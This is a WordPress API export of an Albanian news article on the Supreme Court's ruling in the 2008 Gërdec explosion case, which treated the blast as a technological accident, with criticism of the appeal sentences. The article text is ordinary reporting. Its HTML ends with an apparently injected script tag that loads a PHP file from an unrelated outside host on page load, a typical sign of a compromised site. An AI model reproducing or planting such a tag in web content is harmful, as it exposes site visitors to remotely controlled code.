{"id":320,"date":"2013-09-25T20:29:18","date_gmt":"2013-09-25T20:29:18","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=320"},"modified":"2013-09-28T11:40:02","modified_gmt":"2013-09-28T09:40:02","slug":"gjykata-e-larte-vendos-si-berisha-per-gerdecin-e-quan-aksident-teknologjik","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=320","title":{"rendered":"Gjykata e Lart\u00eb vendos si Berisha p\u00ebr G\u00ebrdecin, e quan aksident teknologjik\u2026"},"content":{"rendered":"<p>Gjykata e Lart\u00eb ka zbardhur vendimin p\u00ebr mospranimin e rekursit t\u00eb dosjes s\u00eb G\u00ebrdecit.<\/p>\n<p>Pak dit\u00eb m\u00eb par\u00eb, trupi gjykues i p\u00ebrb\u00ebr\u00eb nga Tom Ndreca, Admir Thanza, Shk\u00eblzen Selimi, Medi Bici dhe Ardian Nuni, vendos\u00ebn mospranimin e rekursit, t\u00eb paraqitur nga t\u00eb gjitha pal\u00ebt n\u00eb gjykim p\u00ebr dosjen \u201cG\u00ebrdeci\u201d.<\/p>\n<p>Nd\u00ebrsa pak dit\u00eb m\u00eb par\u00eb u publikua fakti se Gjykata e Lart\u00eb nuk e pranonte rekursin, sot zbardhen motivet se p\u00ebrse trupi gjykues vendosi t\u2019i jap\u00eb fund, ligj\u00ebrisht, dosjes s\u00eb G\u00ebrdecit, ku u vran\u00eb 26 persona dhe u plagos\u00ebn qindra t\u00eb tjer\u00eb.<\/p>\n<p>Ajo q\u00eb bie n\u00eb sy \u00ebsht\u00eb fakti se an\u00ebtar\u00ebt e trupit gjykues\u00a0 mendojn\u00eb si ish-kryeministri Sali Berisha p\u00ebr k\u00ebt\u00eb tragjedi.<\/p>\n<p>Gjyqtar\u00ebt Tom Ndreca, Admir Thanza, Shk\u00eblzen Selimi, Medi Bici dhe Ardian Nuni vendosin q\u00eb tragjedia e G\u00ebrdecit \u00ebsht\u00eb nj\u00eb aksident teknologjik.<\/p>\n<p>S\u00eb paku, k\u00ebshtu argumentohet n\u00eb relacionin mbi 100 faqe t\u00eb an\u00ebtar\u00ebve t\u00eb trupit gjykues.<\/p>\n<p>Sipas relacionit t\u00eb b\u00ebr\u00eb publik, Gjykata e Lart\u00eb mendon se n\u00eb rastin e shp\u00ebrthimit t\u00eb fabrik\u00ebs s\u00eb G\u00ebrdecit nuk kemi t\u00eb b\u00ebjm\u00eb me vrasje me dashje, sepse askush nga t\u00eb pandehurit nuk ka synuar k\u00ebt\u00eb pasoj\u00eb, vdekjen e 26 personave dhe rrafshimin e disa fshatrave.<\/p>\n<p>Sipas trupit gjykues, tragjedia \u00ebsht\u00eb shkaktuar nga moszbatimi i rregullave t\u00eb siguris\u00eb teknike n\u00eb pun\u00eb dhe fajtor\u00eb p\u00ebr k\u00ebt\u00eb ngjarje, ku u vran\u00eb 26 persona, jan\u00eb pun\u00ebdh\u00ebn\u00ebsit.<\/p>\n<p>Nj\u00eb vendim ky kontradiktor, pasi gjat\u00eb shp\u00ebrthimit t\u00eb fabrik\u00ebs s\u00eb G\u00ebrdecit nuk kan\u00eb gjetur vdekjen vet\u00ebm punonj\u00ebsit e fabrik\u00ebs, por edhe f\u00ebmij\u00eb q\u00eb luanin n\u00eb oborrin e sht\u00ebpis\u00eb si Erison Durda apo dhe 3- vje\u00e7ari Flavio Deliu.<\/p>\n<p>P\u00ebr k\u00ebt\u00eb raste, Gjykata e Lart\u00eb as q\u00eb denjon t\u00eb shprehet. \u00a0Gjithashtu an\u00ebtar\u00ebt e trupit gjykues kan\u00eb vendosur se gjykimi i shkurtuar p\u00ebr t\u00eb pandehurit, fakt ky q\u00eb \u00ebsht\u00eb pranuar vet\u00ebm n\u00eb Gjykat\u00ebn e Apelit, \u00ebsht\u00eb i drejt\u00eb, pasi p\u00ebr ta \u00e7do i pandehur q\u00eb pranon t\u00eb \u201ckursej\u00eb\u201d ekonomin\u00eb gjyq\u00ebsore, ka t\u00eb drejt\u00eb t\u00eb p\u00ebrfitoj\u00eb nga ulja e d\u00ebnimit.<\/p>\n<p>Por dhe ky arsyetim i trupit gjykues \u00ebsht\u00eb non sens, pasi t\u00eb fituarit n\u00eb k\u00ebt\u00eb proces dol\u00ebn vet\u00ebm t\u00eb pandehurit, q\u00eb aktualisht jan\u00eb t\u00eb lir\u00eb, nd\u00ebrsa familjar\u00ebt e viktimave t\u00eb G\u00ebrdecit ende jan\u00eb n\u00eb k\u00ebrkim t\u00eb drejt\u00ebsis\u00eb, edhe pse ky proces ka vijuar\u00a0 5 vjet n\u00eb gjykatat shqiptare.<\/p>\n<p>Por, p\u00ebrve\u00e7 k\u00ebtyre arsyetimeve, skandal \u00ebsht\u00eb fakti q\u00eb vendimi i Gjykat\u00ebs s\u00eb Lart\u00eb nuk ka kaluar p\u00ebrmes nj\u00eb debati gjyq\u00ebsor mes pal\u00ebve.<\/p>\n<p>N\u00eb raste t\u00eb ngjashme, kur analizohen faktet dhe kur b\u00ebhet thellim n\u00eb interpretimin e ligjit, gjithmon\u00eb pal\u00ebt jan\u00eb prezent n\u00eb proces, duke garantuar nj\u00eb gjykim t\u00eb drejt\u00eb t\u00eb \u00e7\u00ebshtjes. \u00a0K\u00ebshtu, me k\u00ebt\u00eb vendim t\u00eb zbardhur t\u00eb Gjykat\u00ebs s\u00eb Lart\u00eb, i \u00ebsht\u00eb v\u00ebn\u00eb kapak dosjes s\u00eb G\u00ebrdecit, ku ende ka familjar\u00eb q\u00eb k\u00ebrkojn\u00eb drejt\u00ebsi dhe fajtor\u00eb q\u00eb po shijojn\u00eb jet\u00ebn dhe i jan\u00eb rikthyer biznesit t\u00eb tyre.<\/p>\n<p>Me gjith\u00eb shkeljet ligjore, t\u00eb cilat jan\u00eb konstatuar n\u00eb zbardhjen e vendimit t\u00eb Gjykat\u00ebs s\u00eb Lart\u00eb, duket se Prokuroria e P\u00ebrgjithshme nuk ka nd\u00ebrmend ta \u00e7oj\u00eb \u00e7\u00ebshtjen n\u00eb Gjykat\u00ebn Kushtetuese.<\/p>\n<p>Zyrtarisht Prokuroria e P\u00ebrgjithshme thot\u00eb se do t\u00eb analizoj\u00eb vendimin, por fakt \u00ebsht\u00eb se askush nuk beson m\u00eb n\u00eb dh\u00ebnien e drejt\u00ebsis\u00eb p\u00ebr k\u00ebt\u00eb dosje.<\/p>\n<p>&nbsp;<\/p>\n<p><b>Apeli liroi Delijorgjin dhe Pinarin<\/b><\/p>\n<p>Gjykata e Apelit, n\u00eb vendimin e dh\u00ebn\u00eb n\u00eb shkurt t\u00eb k\u00ebtij viti, praktikisht i dhuroi lirin\u00eb t\u00eb akuzuarve kryesor\u00eb t\u00eb tragjedis\u00eb s\u00eb G\u00ebrdecit, Mihal Delijorgjit, Dritan Minxollit dhe Ylli Pinarit.<\/p>\n<p>N\u00eb vendimin e dh\u00ebn\u00eb, treshja gjykuese, e kryesuar nga Alaudin Malaj, Gent Shala dhe Shk\u00eblqim Miri, ka dh\u00ebn\u00eb vendim t\u00eb form\u00ebs s\u00eb prer\u00eb, q\u00eb parashikonte ulje t\u00eb d\u00ebnimit p\u00ebr ish-kreun e kompanis\u00eb MEICO, Ylli Pinari, ish-administratorin e kompanis\u00eb \u201cAlbademil\u201d sh.p.k, Mihal Delijorgji, dhe ish-drejtorin e fabrik\u00ebs s\u00eb demontimit t\u00eb arm\u00ebve, Dritan Minxolli.<\/p>\n<p>T\u00eb tre t\u00eb akuzuarit kan\u00eb p\u00ebrfituar ulje t\u00eb d\u00ebnimit me 1\/3,\u00a0 pasi\u00a0 Gjykata e Apelit ka vendosur t\u00eb aplikoj\u00eb p\u00ebrfundimisht gjykimin e shkurtuar.<\/p>\n<p>Nd\u00ebrkoh\u00eb, Gjykata e Apelit ka shpallur fajtor gjeneralin Zija Bahja, i cili \u00ebsht\u00eb nd\u00ebr t\u00eb pakt\u00ebt ushtarak\u00eb q\u00eb \u00ebsht\u00eb d\u00ebnuar p\u00ebr ngjarjen tragjike t\u00eb G\u00ebrdecit.<\/p>\n<p>Konkretisht, gjenerali Bahja, nga i pafajsh\u00ebm q\u00eb ishte shpallur n\u00eb Gjykat\u00ebn e Shkall\u00ebs s\u00eb Par\u00eb, \u00ebsht\u00eb d\u00ebnuar me 8 vite burg, por nuk do t\u00eb q\u00ebndroj\u00eb n\u00eb qeli, pasi vendimi p\u00ebr t\u00eb \u00ebsht\u00eb pezulluar. P\u00ebrsa u p\u00ebrket t\u00eb pandehurve t\u00eb tjer\u00eb, Agim Babameto, Rezart T\u00ebrshana dhe Besnik Dauti, t\u00eb cil\u00ebt kishin marr\u00eb pafaj\u00ebsi n\u00eb Gjykat\u00ebn e Shkall\u00ebs s\u00eb Par\u00eb, Apeli vendosi nga 1 vit burg p\u00ebr Babameton dhe T\u00ebrshan\u00ebn dhe 3 vite burg p\u00ebr Dautin, por p\u00ebrkoh\u00ebsisht d\u00ebnimi ndaj tyre \u00ebsht\u00eb pezulluar.<\/p>\n<p>Gjykata e Apelit ka vendosur t\u00eb l\u00ebr\u00eb n\u00eb fuqi vendimin e Shkall\u00ebs s\u00eb Par\u00eb p\u00ebr: Agim Lala, i pafajsh\u00ebm, Ardian Mullai, i pafajsh\u00ebm, Shk\u00eblzen Madani, 3 vite burg, Dashnor \u00c7aushi, 3 vite burg, Armand Tartari, 1 vit burg, ish-shefi i Shtabit t\u00eb P\u00ebrgjithsh\u00ebm t\u00eb Forcave t\u00eb Armatosura, Luan Hoxha me 6 vite burg.<\/p>\n<p>N\u00eb fakt Luan Hoxha prej koh\u00ebsh \u00ebsht\u00eb larguar drejt Shteteve t\u00eb Bashkuara t\u00eb Amerik\u00ebs. Prokuroria i k\u00ebrkoi gjykat\u00ebs q\u00eb t\u00eb deklaroj\u00eb 28 persona fajtor\u00eb, mes t\u00eb cil\u00ebve edhe shoq\u00ebrin\u00eb \u201cAlbademil\u201d.<\/p>\n<p>Tragjedia e G\u00ebrdecit, m\u00eb e r\u00ebnda e ndodhur n\u00eb Shqip\u00ebri gjat\u00eb viteve t\u00eb fundit, u regjistrua m\u00eb 15 mars 2008.<\/p>\n<p>Nga shp\u00ebrthimi i nj\u00eb fabrike demontimi vet\u00ebm pak kilometra larg kryeqytetit humb\u00ebn jet\u00ebn 26 persona dhe u plagos\u00ebn 300 t\u00eb tjer\u00eb, nd\u00ebrkaq d\u00ebmet materiale kap\u00ebn shifr\u00ebn e miliona eurove.<\/p>\n<p>Burimi: Gazeta Tema<\/p>\n<p>&nbsp;<script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Gjykata e Lart\u00eb ka zbardhur vendimin p\u00ebr mospranimin e rekursit t\u00eb dosjes s\u00eb G\u00ebrdecit. Pak dit\u00eb m\u00eb par\u00eb, trupi gjykues [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":321,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/320"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=320"}],"version-history":[{"count":3,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/320\/revisions"}],"predecessor-version":[{"id":416,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/320\/revisions\/416"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/321"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=320"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=320"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=320"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}